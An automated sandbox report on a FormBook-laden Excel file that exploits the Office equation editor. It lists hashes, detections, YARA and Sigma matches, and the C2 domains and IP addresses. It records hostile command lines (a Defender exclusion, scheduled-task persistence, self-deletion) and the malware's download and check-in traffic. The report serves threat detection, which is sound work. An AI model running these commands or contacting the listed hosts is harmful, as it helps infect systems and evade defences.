
Windows Analysis Report Payment Details.xlsx

Overview

General Information

Sample Name: Payment Details.xlsx
Analysis ID: 528790
MD5: f49e322b837835ac60cad8c173ecff31
SHA1: c7cddfbf865b528d1bbbbe5c5f3974279cc8b6f5
SHA256: ff4e17d62ce9c71164879418e7942cecf8db37b16cb66adebc6c2570840f8524
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Suspicius Add Task From User AppData Temp
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powershell Defender Exclusion
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Drops PE files to the user root directory
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2408 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1268 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 3028 cmdline: "C:\Users\Public\vbc.exe" MD5: 0F88779E9500075DE85E916637305164)
      • powershell.exe (PID: 2728 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • schtasks.exe (PID: 2636 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • vbc.exe (PID: 1724 cmdline: C:\Users\Public\vbc.exe MD5: 0F88779E9500075DE85E916637305164)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • rundll32.exe (PID: 1292 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • cmd.exe (PID: 2964 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.blancheshelley.xyz/g2fg/"], "decoy": ["snowcrash.website", "pointman.us", "newheartvalve.care", "drandl.com", "sandspringsramblers.com", "programagubernamental.online", "boja.us", "mvrsnike.com", "mentallyillmotherhood.com", "facom.us", "programagubernamental.store", "izivente.com", "roller-v.fr", "amazonbioactives.com", "metaverseapple.xyz", "5gt-mobilevsverizon.com", "gtwebsolutions.co", "scottdunn.life", "usdp.trade", "pikmin.run", "cardano-dogs.com", "bf2hgfy.xyz", "teslafoot.com", "rubertquintana.com", "wellsfargroewards.com", "santel.us", "couponatonline.com", "theunitedhomeland.com", "pmstnly.com", "strlocal.com", "shelleysmucker.com", "youser.online", "emansdesign.com", "usnikeshoesbot.top", "starfish.press", "scotwork.us", "metamorgana.com", "onyxbx.net", "rivas.company", "firstcoastalfb.com", "onpurposetraumainformedcare.com", "celimot.xyz", "jecunikepemej.rest", "lenovolatenightit.com", "unitedsterlingcompanyky.com", "safety2venture.us", "facebookismetanow.com", "scottdunn.review", "mentallyillmotherhood.com", "firstincargo.com", "vikavivi.com", "investmenofpairs.club", "nexans.cloud", "farcloud.fr", "ivermectinforhumans.quest", "5gmalesdf.sbs", "majenta.info", "6vvvvvwmetam.top", "metafirstclass.com", "firstcoinnews.com", "btcetffutures.online", "funinfortmyers.com", "mangoirslk.top", "metaversebasicprivacy.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18859:$sqlite3step: 68 34 1C 7B E1
  • 0x1896c:$sqlite3step: 68 34 1C 7B E1
  • 0x18888:$sqlite3text: 68 38 2A 90 C5
  • 0x189ad:$sqlite3text: 68 38 2A 90 C5
  • 0x1889b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x8937:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x993a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
9.0.vbc.exe.400000.8.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
9.0.vbc.exe.400000.8.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.0.vbc.exe.400000.8.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18859:$sqlite3step: 68 34 1C 7B E1
  • 0x1896c:$sqlite3step: 68 34 1C 7B E1
  • 0x18888:$sqlite3text: 68 38 2A 90 C5
  • 0x189ad:$sqlite3text: 68 38 2A 90 C5
  • 0x1889b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
9.2.vbc.exe.400000.2.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
9.2.vbc.exe.400000.2.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 202.55.132.154, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1268, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1268, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1268, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 3028
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process started; Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard; Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1292
Sigma detected: Suspicius Add Task From User AppData Temp
Source: Process started; Author: frack113; Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\Public\vbc.exe" , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 3028, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp, ProcessId: 2636
Sigma detected: Execution from Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1268, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 3028
Sigma detected: Powershell Defender Exclusion
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\vbc.exe" , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 3028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe, ProcessId: 2728
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1292
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\vbc.exe" , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 3028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe, ProcessId: 2728

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp; Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Payment Details.xlsx; Virustotal: Detection: 36%
Source: Payment Details.xlsx; ReversingLabs: Detection: 33%
Yara detected FormBook
Source: Yara match; File source: 9.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.vbc.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.vbc.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://202.55.132.154/384500000_1/vbc.exe; Avira URL Cloud: Label: malware
Source: www.blancheshelley.xyz/g2fg/; Avira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URL
Source: http://202.55.132.154/384500000_1/vbc.exe; Virustotal: Detection: 12%
Source: www.blancheshelley.xyz/g2fg/; Virustotal: Detection: 8%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe; ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe; ReversingLabs: Detection: 50%
Source: C:\Users\Public\vbc.exe; ReversingLabs: Detection: 50%
Source: 9.2.vbc.exe.706380.3.unpack; Avira: Label: TR/ATRAPS.Gen
Source: 9.2.vbc.exe.30000.0.unpack; Avira: Label: TR/ATRAPS.Gen
Source: 9.0.vbc.exe.400000.10.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.vbc.exe.400000.6.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.vbc.exe.400000.8.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.vbc.exe.400000.2.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb; source: vbc.exe, vbc.exe, 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, vbc.exe, 00000009.00000003.473074012.0000000000930000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.472123384.00000000007D0000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.509705783.0000000000C40000.00000040.00000001.sdmp, rundll32.exe
Source: Binary string: rundll32.pdb; source: vbc.exe, 00000009.00000002.508502052.00000000006F9000.00000004.00000020.sdmp, vbc.exe, 00000009.00000002.506009358.0000000000030000.00000040.00020000.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic; DNS query: name: www.metafirstclass.com
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 202.55.132.154:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 52.128.23.153:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 52.128.23.153:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 52.128.23.153:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Network Connect: 52.128.23.153 80
Source: C:\Windows\explorer.exe; Domain query: www.metafirstclass.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.blancheshelley.xyz/g2fg/
Source: Joe Sandbox View; ASN Name: DOSARRESTUS DOSARRESTUS
Source: Joe Sandbox View; ASN Name: ADTEC-AS-VNADTECMediaJointStockCompanyVN ADTEC-AS-VNADTECMediaJointStockCompanyVN
Source: global traffic; HTTP traffic detected: GET /g2fg/?hZlpd=H/0ZmZGK5jsRiriaZut4CEFQpFY2p/TAFyTzOdFvzC4udK1/lSWrgm9fn/kzXoflvKU/jw==&LRgXx=fbcXTtnx6x HTTP/1.1Host: www.metafirstclass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View; IP Address: 52.128.23.153 52.128.23.153
Source: Joe Sandbox View; IP Address: 202.55.132.154 202.55.132.154
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 18:29:20 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31Last-Modified: Thu, 25 Nov 2021 04:42:24 GMTETag: "b0a00-5d19599d2da5b"Accept-Ranges: bytesContent-Length: 723456Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Source: global traffic; HTTP traffic detected: GET /384500000_1/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 202.55.132.154Connection: Keep-Alive
Source: unknown; TCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: unknownTCP traffic detected without corresponding DNS query: 202.55.132.154
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://java.sun.com
          Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: vbc.exe, 00000004.00000002.474472621.0000000005540000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491540461.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: schtasks.exe, 00000007.00000002.463015056.0000000001D80000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.493199905.0000000003E50000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: vbc.exe, 00000004.00000002.474472621.0000000005540000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.491540461.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 0000000A.00000000.490555134.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.549359259.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 0000000A.00000000.492734563.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 0000000A.00000000.552748099.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 0000000A.00000000.485042288.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 0000000A.00000000.493703831.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.482071352.0000000008430000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.493807218.00000000045D4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.487992474.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.554578826.0000000008430000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
